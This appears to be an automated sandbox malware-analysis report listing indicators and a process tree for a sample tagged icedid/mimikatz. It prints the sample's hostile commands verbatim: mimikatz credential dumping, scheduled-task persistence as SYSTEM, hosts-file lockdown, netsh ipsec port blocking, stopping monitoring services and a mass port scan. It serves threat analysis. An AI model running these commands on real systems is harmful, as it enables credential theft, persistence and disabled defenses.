\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bjfisnrbq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language luprqy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language yittybr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vmlbqggye.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4016 cmd.exe 3412 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000a000000023b9d-6.dat nsis_installer_2 behavioral2/files/0x000c000000023bb4-15.dat nsis_installer_1 behavioral2/files/0x000c000000023bb4-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing yittybr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" yittybr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" yittybr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" yittybr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" yittybr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ yittybr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ yittybr.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3412 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2220 schtasks.exe 4648 schtasks.exe 4456 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 740 2024-11-16_f92ab9f95fc7af060e030eba3740eb5a_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 740 2024-11-16_f92ab9f95fc7af060e030eba3740eb5a_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2284 yittybr.exe Token: SeDebugPrivilege 4592 yittybr.exe Token: SeDebugPrivilege 2792 vfshost.exe Token: SeDebugPrivilege 1432 btjlhtrlh.exe Token: SeLockMemoryPrivilege 4500 ttlnnh.exe Token: SeLockMemoryPrivilege 4500 ttlnnh.exe Token: SeDebugPrivilege 2492 btjlhtrlh.exe Token: SeDebugPrivilege 2984 btjlhtrlh.exe Token: SeDebugPrivilege 2108 btjlhtrlh.exe Token: SeDebugPrivilege 1836 btjlhtrlh.exe Token: SeDebugPrivilege 3616 btjlhtrlh.exe Token: SeDebugPrivilege 540 btjlhtrlh.exe Token: SeDebugPrivilege 4316 btjlhtrlh.exe Token: SeDebugPrivilege 2680 btjlhtrlh.exe Token: SeDebugPrivilege 816 btjlhtrlh.exe Token: SeDebugPrivilege 2792 btjlhtrlh.exe Token: SeDebugPrivilege 4320 btjlhtrlh.exe Token: SeDebugPrivilege 4008 btjlhtrlh.exe Token: SeDebugPrivilege 3280 btjlhtrlh.exe Token: SeDebugPrivilege 2848 btjlhtrlh.exe Token: SeDebugPrivilege 4492 btjlhtrlh.exe Token: SeDebugPrivilege 1004 btjlhtrlh.exe Token: SeDebugPrivilege 4824 btjlhtrlh.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 740 2024-11-16_f92ab9f95fc7af060e030eba3740eb5a_hacktools_icedid_mimikatz.exe 740 2024-11-16_f92ab9f95fc7af060e030eba3740eb5a_hacktools_icedid_mimikatz.exe 2284 yittybr.exe 2284 yittybr.exe 4592 yittybr.exe 4592 yittybr.exe 3852 xohudmc.exe 180 luprqy.exe 3904 yittybr.exe 3904 yittybr.exe 4472 yittybr.exe 4472 yittybr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 740 wrote to memory of 4016 740 2024-11-16_f92ab9f95fc7af060e030eba3740eb5a_hacktools_icedid_mimikatz.exe 85 PID 740 wrote to memory of 4016 740 2024-11-16_f92ab9f95fc7af060e030eba3740eb5a_hacktools_icedid_mimikatz.exe 85 PID 740 wrote to memory of 4016 740 2024-11-16_f92ab9f95fc7af060e030eba3740eb5a_hacktools_icedid_mimikatz.exe 85 PID 4016 wrote to memory of 3412 4016 cmd.exe 87 PID 4016 wrote to memory of 3412 4016 cmd.exe 87 PID 4016 wrote to memory of 3412 4016 cmd.exe 87 PID 4016 wrote to memory of 2284 4016 cmd.exe 94 PID 4016 wrote to memory of 2284 4016 cmd.exe 94 PID 4016 wrote to memory of 2284 4016 cmd.exe 94 PID 4592 wrote to memory of 1148 4592 yittybr.exe 97 PID 4592 wrote to memory of 1148 4592 yittybr.exe 97 PID 4592 wrote to memory of 1148 4592 yittybr.exe 97 PID 1148 wrote to memory of 2396 1148 cmd.exe 99 PID 1148 wrote to memory of 2396 1148 cmd.exe 99 PID 1148 wrote to memory of 2396 1148 cmd.exe 99 PID 1148 wrote to memory of 4880 1148 cmd.exe 100 PID 1148 wrote to memory of 4880 1148 cmd.exe 100 PID 1148 wrote to memory of 4880 1148 cmd.exe 100 PID 1148 wrote to memory of 4480 1148 cmd.exe 101 PID 1148 wrote to memory of 4480 1148 cmd.exe 101 PID 1148 wrote to memory of 4480 1148 cmd.exe 101 PID 1148 wrote to memory of 1616 1148 cmd.exe 102 PID 1148 wrote to memory of 1616 1148 cmd.exe 102 PID 1148 wrote to memory of 1616 1148 cmd.exe 102 PID 1148 wrote to memory of 4612 1148 cmd.exe 103 PID 1148 wrote to memory of 4612 1148 cmd.exe 103 PID 1148 wrote to memory of 4612 1148 cmd.exe 103 PID 1148 wrote to memory of 4244 1148 cmd.exe 104 PID 1148 wrote to memory of 4244 1148 cmd.exe 104 PID 1148 wrote to memory of 4244 1148 cmd.exe 104 PID 4592 wrote to memory of 2996 4592 yittybr.exe 107 PID 4592 wrote to memory of 2996 4592 yittybr.exe 107 PID 4592 wrote to memory of 2996 4592 yittybr.exe 107 PID 4592 wrote to memory of 4908 4592 yittybr.exe 109 PID 4592 wrote to memory of 4908 4592 yittybr.exe 109 PID 4592 wrote to memory of 4908 4592 yittybr.exe 109 PID 4592 wrote to memory of 3012 4592 yittybr.exe 111 PID 4592 wrote to memory of 3012 4592 yittybr.exe 111 PID 4592 wrote to memory of 3012 4592 yittybr.exe 111 PID 4592 wrote to memory of 4616 4592 yittybr.exe 115 PID 4592 wrote to memory of 4616 4592 yittybr.exe 115 PID 4592 wrote to memory of 4616 4592 yittybr.exe 115 PID 4616 wrote to memory of 2180 4616 cmd.exe 117 PID 4616 wrote to memory of 2180 4616 cmd.exe 117 PID 4616 wrote to memory of 2180 4616 cmd.exe 117 PID 2180 wrote to memory of 4052 2180 wpcap.exe 118 PID 2180 wrote to memory of 4052 2180 wpcap.exe 118 PID 2180 wrote to memory of 4052 2180 wpcap.exe 118 PID 4052 wrote to memory of 2576 4052 net.exe 120 PID 4052 wrote to memory of 2576 4052 net.exe 120 PID 4052 wrote to memory of 2576 4052 net.exe 120 PID 2180 wrote to memory of 2448 2180 wpcap.exe 121 PID 2180 wrote to memory of 2448 2180 wpcap.exe 121 PID 2180 wrote to memory of 2448 2180 wpcap.exe 121 PID 2448 wrote to memory of 4724 2448 net.exe 123 PID 2448 wrote to memory of 4724 2448 net.exe 123 PID 2448 wrote to memory of 4724 2448 net.exe 123 PID 2180 wrote to memory of 2876 2180 wpcap.exe 124 PID 2180 wrote to memory of 2876 2180 wpcap.exe 124 PID 2180 wrote to memory of 2876 2180 wpcap.exe 124 PID 2876 wrote to memory of 1080 2876 net.exe 126 PID 2876 wrote to memory of 1080 2876 net.exe 126 PID 2876 wrote to memory of 1080 2876 net.exe 126 PID 2180 wrote to memory of 2964 2180 wpcap.exe 127
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2092
-
C:\Windows\TEMP\lntjubmbe\ttlnnh.exe"C:\Windows\TEMP\lntjubmbe\ttlnnh.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4500
-
-
C:\Users\Admin\AppData\Local\Temp\2024-11-16_f92ab9f95fc7af060e030eba3740eb5a_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-11-16_f92ab9f95fc7af060e030eba3740eb5a_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tllefmnq\yittybr.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3412
-
-
C:\Windows\tllefmnq\yittybr.exeC:\Windows\tllefmnq\yittybr.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2284
-
-
-
C:\Windows\tllefmnq\yittybr.exeC:\Windows\tllefmnq\yittybr.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2396
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:4880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4480
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:1616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4612
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:4244
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2996
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4908
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3012
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exeC:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:2576
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4724
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:1080
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:2964 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:3156
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:3756
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4016 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4544
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2356
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2888 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4612
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ppgkyibiq\ihnqsqiep\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:1148 -
C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exeC:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ppgkyibiq\ihnqsqiep\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ppgkyibiq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ppgkyibiq\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:2952 -
C:\Windows\ppgkyibiq\Corporate\vfshost.exeC:\Windows\ppgkyibiq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yllebvbbl" /ru system /tr "cmd /c C:\Windows\ime\yittybr.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2200 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3236
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "yllebvbbl" /ru system /tr "cmd /c C:\Windows\ime\yittybr.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fmptikrhb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2248 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4816
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "fmptikrhb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4456
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "blhbujgqb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:3140 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3444
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "blhbujgqb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4648
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1424
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1876
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4112
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3336
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2448
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1724
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
